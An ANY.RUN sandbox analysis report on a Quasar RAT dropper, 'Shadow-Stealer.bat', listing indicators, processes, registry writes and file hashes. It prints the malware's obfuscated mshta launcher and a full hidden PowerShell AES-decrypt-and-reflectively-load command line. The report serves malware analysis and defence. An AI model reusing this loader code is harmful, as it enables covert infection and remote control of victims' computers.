File name:

Shadow-Stealer.bat

Full analysis: https://app.any.run/tasks/9f161d26-4048-4ea6-a10a-9494842a776e
Verdict: Malicious activity
Threats:

Quasar is a very popular RAT in the world thanks to its code being available in open-source. This malware can be used to control the victim’s computer remotely.

Malware Trends Tracker     >>>
Analysis date: December 03, 2023, 17:33:55
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
quasar
Indicators:
MIME: text/plain
File info: ASCII text, with very long lines, with CRLF line terminators
MD5:

CF5B412FFC3CE43CD7DDCE602FC67F56

SHA1:

221DFCD0868158F676C472D8A5BCF9647F0C7D51

SHA256:

84BA648CFDD5C2AE8D3292FCC1702E385A1A26E915BD7275B5FDE776212F2724

SSDEEP:

49152:mmlB6XvIxKx/znMtw4e/x4dA+ilmm5C5rsw1y1lkGxJW5RXLnfaWixbVoZmb0nYk:b

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Drops the executable file immediately after the start

      • cmd.exe (PID: 4320)
      • Shadow-Stealer.bat.exe (PID: 6484)

    • Starts PowerShell from an unusual location

      • cmd.exe (PID: 4320)
      • cmd.exe (PID: 1360)
      • $sxr-cmd.exe (PID: 3780)
      • $sxr-powershell.exe (PID: 6312)

    • Known privilege escalation attack

      • dllhost.exe (PID: 2480)

    • Runs injected code in another process

      • Shadow-Stealer.bat.exe (PID: 6484)
      • $sxr-powershell.exe (PID: 6312)

    • Application was injected by another process

      • dllhost.exe (PID: 4484)
      • dllhost.exe (PID: 4344)
      • dllhost.exe (PID: 6132)
      • dllhost.exe (PID: 7364)
      • dllhost.exe (PID: 7644)
      • dllhost.exe (PID: 4572)
      • dllhost.exe (PID: 8084)
      • dllhost.exe (PID: 7820)
      • dllhost.exe (PID: 7304)

    • Starts CMD.EXE for self-deleting

      • Shadow-Stealer.bat.exe (PID: 6484)

    • QUASAR has been detected (YARA)

      • $sxr-powershell.exe (PID: 6312)

  • SUSPICIOUS

    • Process drops legitimate windows executable

      • cmd.exe (PID: 4320)
      • Shadow-Stealer.bat.exe (PID: 6484)

    • Checks Windows Trust Settings

      • Shadow-Stealer.bat.exe (PID: 5392)
      • Shadow-Stealer.bat.exe (PID: 6484)
      • $sxr-powershell.exe (PID: 6312)
      • $sxr-powershell.exe (PID: 1540)

    • Reads security settings of Internet Explorer

      • Shadow-Stealer.bat.exe (PID: 5392)
      • Shadow-Stealer.bat.exe (PID: 6484)
      • $sxr-powershell.exe (PID: 6312)
      • $sxr-powershell.exe (PID: 1540)

    • Start notepad (likely ransomware note)

      • Shadow-Stealer.bat.exe (PID: 5392)

    • Base64-obfuscated command line is found

      • Shadow-Stealer.bat.exe (PID: 5392)

    • Starts CMD.EXE for commands execution

      • dllhost.exe (PID: 2480)
      • Shadow-Stealer.bat.exe (PID: 6484)

    • Starts POWERSHELL.EXE for commands execution

      • Shadow-Stealer.bat.exe (PID: 5392)

    • Executing commands from a ".bat" file

      • dllhost.exe (PID: 2480)
      • Shadow-Stealer.bat.exe (PID: 6484)

    • The process creates files with name similar to system file names

      • Shadow-Stealer.bat.exe (PID: 6484)

    • Reads Microsoft Outlook installation path

      • $sxr-mshta.exe (PID: 1460)

    • The process executes via Task Scheduler

      • $sxr-mshta.exe (PID: 1460)

    • Get information on the list of running processes

      • $sxr-cmd.exe (PID: 3780)
      • $sxr-powershell.exe (PID: 6312)

    • Reads Internet Explorer settings

      • $sxr-mshta.exe (PID: 1460)

    • Application launched itself

      • $sxr-powershell.exe (PID: 6312)

    • Connects to unusual port

      • $sxr-powershell.exe (PID: 6312)

    • Executes application which crashes

      • dllhost.exe (PID: 7364)

    • Runs PING.EXE to delay simulation

      • cmd.exe (PID: 7588)

    • Uses TASKKILL.EXE to kill process

      • cmd.exe (PID: 7588)

    • Uses ATTRIB.EXE to modify file attributes

      • cmd.exe (PID: 7588)

    • Starts itself from another location

      • Shadow-Stealer.bat.exe (PID: 5392)

  • INFO

    • Checks supported languages

      • Shadow-Stealer.bat.exe (PID: 5392)
      • Shadow-Stealer.bat.exe (PID: 6484)
      • $sxr-mshta.exe (PID: 1460)
      • $sxr-cmd.exe (PID: 3780)
      • $sxr-powershell.exe (PID: 6312)
      • $sxr-powershell.exe (PID: 1540)

    • Process checks Powershell version

      • Shadow-Stealer.bat.exe (PID: 5392)
      • Shadow-Stealer.bat.exe (PID: 6484)
      • $sxr-powershell.exe (PID: 6312)
      • $sxr-powershell.exe (PID: 1540)

    • Reads the software policy settings

      • Shadow-Stealer.bat.exe (PID: 5392)
      • Shadow-Stealer.bat.exe (PID: 6484)
      • $sxr-powershell.exe (PID: 6312)
      • $sxr-powershell.exe (PID: 1540)

    • Reads Environment values

      • Shadow-Stealer.bat.exe (PID: 5392)
      • Shadow-Stealer.bat.exe (PID: 6484)
      • $sxr-mshta.exe (PID: 1460)
      • $sxr-powershell.exe (PID: 6312)
      • $sxr-powershell.exe (PID: 1540)

    • Checks transactions between databases Windows and Oracle

      • powershell.exe (PID: 6596)

    • Creates files or folders in the user directory

      • Shadow-Stealer.bat.exe (PID: 5392)

    • Create files in a temporary directory

      • Shadow-Stealer.bat.exe (PID: 6484)
      • $sxr-powershell.exe (PID: 1540)
      • $sxr-powershell.exe (PID: 6312)
      • Shadow-Stealer.bat.exe (PID: 5392)

    • Reads the computer name

      • Shadow-Stealer.bat.exe (PID: 6484)
      • $sxr-mshta.exe (PID: 1460)
      • $sxr-powershell.exe (PID: 6312)
      • $sxr-powershell.exe (PID: 1540)
      • Shadow-Stealer.bat.exe (PID: 5392)

    • Reads the machine GUID from the registry

      • Shadow-Stealer.bat.exe (PID: 6484)
      • $sxr-powershell.exe (PID: 6312)
      • $sxr-powershell.exe (PID: 1540)
      • Shadow-Stealer.bat.exe (PID: 5392)

    • Process checks Internet Explorer phishing filters

      • $sxr-mshta.exe (PID: 1460)

    • Process checks computer location settings

      • $sxr-mshta.exe (PID: 1460)
      • Shadow-Stealer.bat.exe (PID: 6484)
      • Shadow-Stealer.bat.exe (PID: 5392)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
165
Monitored processes
38
Malicious processes
8
Suspicious processes
1

Behavior graph

Click at the process to see the details
start inject inject inject inject inject inject inject inject inject cmd.exe no specs conhost.exe no specs shadow-stealer.bat.exe no specs notepad.exe no specs powershell.exe no specs conhost.exe no specs CMSTPLUA no specs cmd.exe no specs conhost.exe no specs shadow-stealer.bat.exe no specs dllhost.exe dllhost.exe no specs $sxr-mshta.exe no specs $sxr-cmd.exe no specs conhost.exe no specs #QUASAR $sxr-powershell.exe dllhost.exe dllhost.exe no specs $sxr-powershell.exe no specs dllhost.exe dllhost.exe no specs dllhost.exe dllhost.exe no specs dllhost.exe dllhost.exe no specs dllhost.exe dllhost.exe no specs dllhost.exe dllhost.exe no specs dllhost.exe dllhost.exe no specs dllhost.exe dllhost.exe no specs cmd.exe no specs conhost.exe no specs ping.exe no specs taskkill.exe no specs attrib.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
232C:\Windows\SysWOW64\dllhost.exe /Processid:{a7bbb80d-832c-46b3-b6d7-ce22e4ce220e}C:\Windows\SysWOW64\dllhost.exe$sxr-powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
COM Surrogate
Exit code:
0
Version:
10.0.19041.546 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\dllhost.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\advapi32.dll
c:\windows\syswow64\msvcrt.dll
1360C:\WINDOWS\system32\cmd.exe /c ""C:\Users\admin\Desktop\Shadow-Stealer.bat" "C:\Windows\System32\cmd.exedllhost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cmdext.dll
c:\windows\system32\advapi32.dll
1460C:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-tjptoUybjVuvgCOJtIWn4312:&#<?=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"C:\Windows\$sxr-mshta.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
11.00.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\$sxr-mshta.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\wldp.dll
c:\windows\system32\mshtml.dll
1540"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(6312).WaitForExit();[System.Threading.Thread]::Sleep(5000); function VOHZF($Lwtxx){ $xCaUG=[System.Security.Cryptography.Aes]::Create(); $xCaUG.Mode=[System.Security.Cryptography.CipherMode]::CBC; $xCaUG.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $xCaUG.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0='); $xCaUG.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg=='); $CTnvz=$xCaUG.('rotpyrceDetaerC'[-1..-15] -join '')(); $oMfGF=$CTnvz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Lwtxx, 0, $Lwtxx.Length); $CTnvz.Dispose(); $xCaUG.Dispose(); $oMfGF;}function nnKof($Lwtxx){ $ABMbT=New-Object System.IO.MemoryStream(,$Lwtxx); $FswzF=New-Object System.IO.MemoryStream; $ZWQus=New-Object System.IO.Compression.GZipStream($ABMbT, [IO.Compression.CompressionMode]::Decompress); $ZWQus.CopyTo($FswzF); $ZWQus.Dispose(); $ABMbT.Dispose(); $FswzF.Dispose(); $FswzF.ToArray();}function vzvJZ($Lwtxx,$kAWoQ){ $kXIpu=[System.Reflection.Assembly]::Load([byte[]]$Lwtxx); $OPPDg=$kXIpu.EntryPoint; $OPPDg.Invoke($null, $kAWoQ);}$xCaUG1 = New-Object System.Security.Cryptography.AesManaged;$xCaUG1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$xCaUG1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$xCaUG1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0=');$xCaUG1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg==');$qsFQP = $xCaUG1.('rotpyrceDetaerC'[-1..-15] -join '')();$UMIrZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2twxIFMV1JWyz0b8BpHEfA==');$UMIrZ = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ, 0, $UMIrZ.Length);$UMIrZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ);$PYyQA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('p05ztWCKuMfos2Q8RYoS+FIXy2DypHHbyYGL6Z+cEc8=');$PYyQA = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($PYyQA, 0, $PYyQA.Length);$PYyQA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($PYyQA);$roofG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Sy8HcJTfKA/mf4hPH+Go6g==');$roofG = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($roofG, 0, $roofG.Length);$roofG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($roofG);$tgmGC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BuxXfqRY1RoP0b/ROY4PrLV7XH6EyWkqL6UOT7VtjFZgNba4DmwvRZ0rEKh6tsW5E4dar7n8yKYorGfhmfzDSchZoElrP0gmf7pENQ75eXbqF+3j4N1LjY1xzYPYeJFwvJGbJvqe3CPoWhNQATtYtY/6ujGYTqqhsjIgqQdcVJyCExpvLG1KTAiDHwbcLEgHzlPLvK+nTj2PYL6WYsFa3I8rptDz3r9IvJABT8A6TOqZRS2q9nM/2K1/IRFUTDKvPPtYy9cd0jq4MTO7gDnvlUAC8kJM0rAwSo8RwA3zKJNYBBv03aq6fIf9zugDa03cb0yO24aIfe5AFN+zOGDLKtWrsyyIVpjarzDCbBlxkhPRynAyHBM2A5pmzVa2gAc2+o8odD180Z07f5ZL3mYwTO8G4arHTtORWkqMdtdm7CA=');$tgmGC = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tgmGC, 0, $tgmGC.Length);$tgmGC = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tgmGC);$zvkCv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JVVxi793TWK0eiazbMjyxQ==');$zvkCv = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($zvkCv, 0, $zvkCv.Length);$zvkCv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($zvkCv);$MrvyW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('y9CiMcnIF08D1mbStDfFzg==');$MrvyW = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($MrvyW, 0, $MrvyW.Length);$MrvyW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($MrvyW);$UFhRe = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4Gkz3kktZWs5v4iY/fwpuA==');$UFhRe = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UFhRe, 0, $UFhRe.Length);$UFhRe = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UFhRe);$BdNHQ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mWujaRBJ7Bka6/SLPc2zjg==');$BdNHQ = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BdNHQ, 0, $BdNHQ.Length);$BdNHQ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BdNHQ);$NXCWg = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JS1eCTl+J3Vy2lPum4BV+A==');$NXCWg = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NXCWg, 0, $NXCWg.Length);$NXCWg = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NXCWg);$UMIrZ0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Xun+s5YVAeQzgGPJKptAJw==');$UMIrZ0 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ0, 0, $UMIrZ0.Length);$UMIrZ0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ0);$UMIrZ1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tKxTd8rUmwwPDWYqtJ+flg==');$UMIrZ1 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ1, 0, $UMIrZ1.Length);$UMIrZ1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ1);$UMIrZ2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QwPWmxWc7oP0xMzohMzOyA==');$UMIrZ2 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ2, 0, $UMIrZ2.Length);$UMIrZ2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ2);$UMIrZ3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('00EoyZz50MzeF+YVDb5OyQ==');$UMIrZ3 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ3, 0, $UMIrZ3.Length);$UMIrZ3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ3);$qsFQP.Dispose();$xCaUG1.Dispose();if (@(get-process -ea silentlycontinue $UMIrZ3).count -gt 1) {exit};$dINWW = [Microsoft.Win32.Registry]::$BdNHQ.$UFhRe($UMIrZ).$MrvyW($PYyQA);$QJXfU=[string[]]$dINWW.Split('\');$flTmo=nnKof(VOHZF([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($QJXfU[1])));vzvJZ $flTmo (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$iBTnS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($QJXfU[0]);$xCaUG = New-Object System.Security.Cryptography.AesManaged;$xCaUG.Mode = [System.Security.Cryptography.CipherMode]::CBC;$xCaUG.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$xCaUG.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0=');$xCaUG.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg==');$CTnvz = $xCaUG.('rotpyrceDetaerC'[-1..-15] -join '')();$iBTnS = $CTnvz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($iBTnS, 0, $iBTnS.Length);$CTnvz.Dispose();$xCaUG.Dispose();$ABMbT = New-Object System.IO.MemoryStream(, $iBTnS);$FswzF = New-Object System.IO.MemoryStream;$ZWQus = New-Object System.IO.Compression.GZipStream($ABMbT, [IO.Compression.CompressionMode]::$UMIrZ1);$ZWQus.$NXCWg($FswzF);$ZWQus.Dispose();$ABMbT.Dispose();$FswzF.Dispose();$iBTnS = $FswzF.ToArray();$JJwWP = $tgmGC | IEX;$kXIpu = $JJwWP::$UMIrZ2($iBTnS);$OPPDg = $kXIpu.EntryPoint;$OPPDg.$UMIrZ0($null, (, [string[]] ($roofG)))C:\Windows\$sxr-powershell.exe$sxr-powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.546 (WinBuild.160101.0800)
Modules
Images
c:\windows\$sxr-powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1752C:\Windows\SysWOW64\dllhost.exe /Processid:{4ff968b2-86c5-482d-ac84-917c711a03b1}C:\Windows\SysWOW64\dllhost.exeShadow-Stealer.bat.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
COM Surrogate
Exit code:
0
Version:
10.0.19041.546 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\dllhost.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\advapi32.dll
c:\windows\syswow64\msvcrt.dll
2480C:\WINDOWS\system32\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}C:\Windows\System32\dllhost.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
COM Surrogate
Exit code:
0
Version:
10.0.19041.546 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\dllhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\bcryptprimitives.dll
3020\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
3116\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exe$sxr-cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
3200"C:\Windows\System32\notepad.exe" C:\Windows\System32\notepad.exeShadow-Stealer.bat.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Notepad
Exit code:
4294967295
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\notepad.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\user32.dll
3780"C:\Windows\$sxr-cmd.exe" /c %$sxr-tjptoUybjVuvgCOJtIWn4312:&#<?=%C:\Windows\$sxr-cmd.exe$sxr-mshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.746 (WinBuild.160101.0800)
Modules
Images
c:\windows\$sxr-cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
c:\windows\system32\shlwapi.dll
Total events
21 489
Read events
21 446
Write events
40
Delete events
3

Modification events

(PID) Process:(5392) Shadow-Stealer.bat.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
(PID) Process:(5392) Shadow-Stealer.bat.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:IntranetName
Value:
1
(PID) Process:(5392) Shadow-Stealer.bat.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
1
(PID) Process:(5392) Shadow-Stealer.bat.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
0
(PID) Process:(2480) dllhost.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
(PID) Process:(2480) dllhost.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:IntranetName
Value:
1
(PID) Process:(2480) dllhost.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
1
(PID) Process:(2480) dllhost.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
0
(PID) Process:(6596) powershell.exeKey:HKEY_CURRENT_USER\Environment
Operation:delete valueName:tfutWIwDIVfhoNZuYdGJ
Value:
C:\Users\admin\Desktop\Shadow-Stealer.bat
(PID) Process:(1460) $sxr-mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
Executable files
4
Suspicious files
1
Text files
12
Unknown types
0

Dropped files

PID
Process
Filename
Type
6596powershell.exeC:\Users\admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logtext
MD5:6B8DB881D2E37BA23833C3AD3B3463BF
SHA256:ECF86FA19F4B47EDC433CA3BA77AEBBB082B502954FA26D1481F009C549A69EA
6596powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_zril2adb.rm1.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
5392Shadow-Stealer.bat.exeC:\Users\admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Shadow-Stealer.bat.exe.logtext
MD5:822E8EDDE34F458947DE4A2BD44A7A10
SHA256:2DC2C8FCEB374EC74F9FCCFFDBE29E8120907098E3A947A2722A10E1A66CEE23
6484Shadow-Stealer.bat.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_3rvwussw.ghh.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6484Shadow-Stealer.bat.exeC:\Windows\$sxr-powershell.exeexecutable
MD5:04029E121A0CFA5991749937DD22A1D9
SHA256:9F914D42706FE215501044ACD85A32D58AAEF1419D404FDDFA5D3B48F66CCD9F
5392Shadow-Stealer.bat.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_xww3wmm2.1xy.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
5392Shadow-Stealer.bat.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_l5uzz23k.n1g.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6596powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_3nz3wogp.ql5.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
5392Shadow-Stealer.bat.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:3C2119524D18EDBDEF6D9CF248CABD35
SHA256:7DF23E8D1BED8C94E5329304F48A2C97AE3274AD41C8EB276726A7FE64D003A5
4320cmd.exeC:\Users\admin\Desktop\Shadow-Stealer.bat.exeexecutable
MD5:04029E121A0CFA5991749937DD22A1D9
SHA256:9F914D42706FE215501044ACD85A32D58AAEF1419D404FDDFA5D3B48F66CCD9F
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
10
TCP/UDP connections
42
